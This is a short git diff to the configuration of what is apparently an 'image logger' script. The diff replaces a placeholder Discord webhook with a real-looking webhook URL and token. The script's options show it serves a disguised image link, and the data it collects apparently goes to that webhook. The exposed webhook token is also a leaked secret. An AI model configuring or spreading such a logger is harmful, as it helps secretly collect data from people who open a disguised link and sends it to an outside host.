diff --git a/main.py b/main.py index 9600de7..d47ab8d 100644 --- a/main.py +++ b/main.py @@ -12,7 +12,7 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", + "webhook": "https://discord.com/api/webhooks/1238312337396465786/2yWSvA6xBvQV49wjnVykR0qe3kN8k8zyWkGCGB-ZNBc3_RE_9Enuma3lyoYxqZRzTrjK", "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)